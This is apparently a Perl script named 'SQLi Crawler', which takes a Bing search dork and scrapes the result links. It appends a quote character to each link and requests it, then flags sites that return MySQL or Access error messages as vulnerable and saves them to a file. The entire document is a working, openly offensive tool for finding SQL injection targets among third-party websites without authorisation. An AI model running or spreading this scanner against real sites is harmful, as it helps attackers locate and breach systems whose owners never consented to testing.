#!/usr/bin/perluse strict;use warnings;use HTTP::Request;use LWP::User

1. #!/usr/bin/perl
2.  
3. use strict;
4. use warnings;
5. use HTTP::Request;
6. use LWP::UserAgent;
7.  
8. ###############
9. my $dork;
10. my $url;
11. my $i;
12. my $request;
13. my $useragent;
14. my $response;
15. my $start;
16. my $end;
17. my $result;
18. my $fl;
19. my $link;
20. my $req;
21. my $ua;
22. my $result2;
23. my $res;
24. my $save;
25. my $pages;
26. my $page;
27. my $choice;
28. ##############
29. my @z;
30.  
31. print q{
32. _ ____ _
33. | | _ \ | |
34. __| | |_) | ___ | |_
35. / _` | _ < / _ \| __|
36. | (_| | |_) | (_) | |_
37. \__,_|____/ \___/ \__|
38.  
39. ################################
40. ## / SQLi Crawler / ##
41. ## Private Edition ##
42. ## ~Coded by dbx~ ##
43. ################################
44.  
45. };
46.  
47. MainMenu:
48.  
49. print "------------------------\n";
50. print "Enter [1] To Begin SQLi.\n";
51. print "Enter [2] To Exit.\n";
52. print "------------------------\n\n";
53. print "Your Choice: ";
54.  
55. chomp ($choice = <STDIN>);
56. print "\n";
57.  
58. if ($choice eq 1) {&sql_scan}
59. if ($choice eq 5) {die;}
60.  
61. sub sql_scan
62. {
63.  
64. print "[+] Enter Bing! dork: ";
65. chomp ($dork = <STDIN>);
66. print "\n";
67. print "[+] How Many Pages To Leech?: ";
68. chomp ($pages = <STDIN>);
69. print "\n";
70.  
71. $page = $pages.'1';
72.  
73. print "[~] Crawling...\n\n";
74.  
75. for ($i = 0; $i <= $page; $i=$i+11)
76. {
77.  
78. $url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";
79.  
80. $request = HTTP::Request->new(GET => $url);
81. $useragent = LWP::UserAgent->new();
82. $response = $useragent->request($request);
83. $result = $response->content;
84.  
85. $start = '<h3><a href="';
86. $end = '" onmousedown=';
87.  
88. while ($result =~ m/$start(.*?)$end/g)
89.  
90. {
91. $fl = $1;
92. $link = $fl."%27";
93. $req = HTTP::Request->new(GET => $link);
94. $ua = LWP::UserAgent->new();
95. $res = $ua->request($req);
96. $result2 = $res->content;
97.  
98. if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
99. {
100. push @z, $link;
101. print "[+] MySQL Vulnerable: $link\n\n";
102. }
103.  
104. elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
105. {
106. push @z, $link;
107. print "[+] MsSQL Vulnerable: $link\n\n";
108. }
109.  
110. else {
111.  
112. print "[-] $link <- Not Vulnerable\n\n";
113. }
114. }
115.  
116. }
117. print "Vulnerable Links:\n";
118. print "-----------------------------------\n";
119. foreach (@z)
120. {
121. print "$_ \n\n";
122. }
123. print "Save Into A Text File? (Y or N): ";
124. chomp ($save = <STDIN>);
125.  
126. if ($save eq 'Y')
127. {
128. print "Saving File...\n\n";
129. open(vuln_file, ">>Vulns.txt");
130. foreach (@z)
131. {
132. print vuln_file "$_ \n";
133. }
134. close(vuln_file);
135. print "File Saved!\n\n";
136. }
137. goto MainMenu;
138. }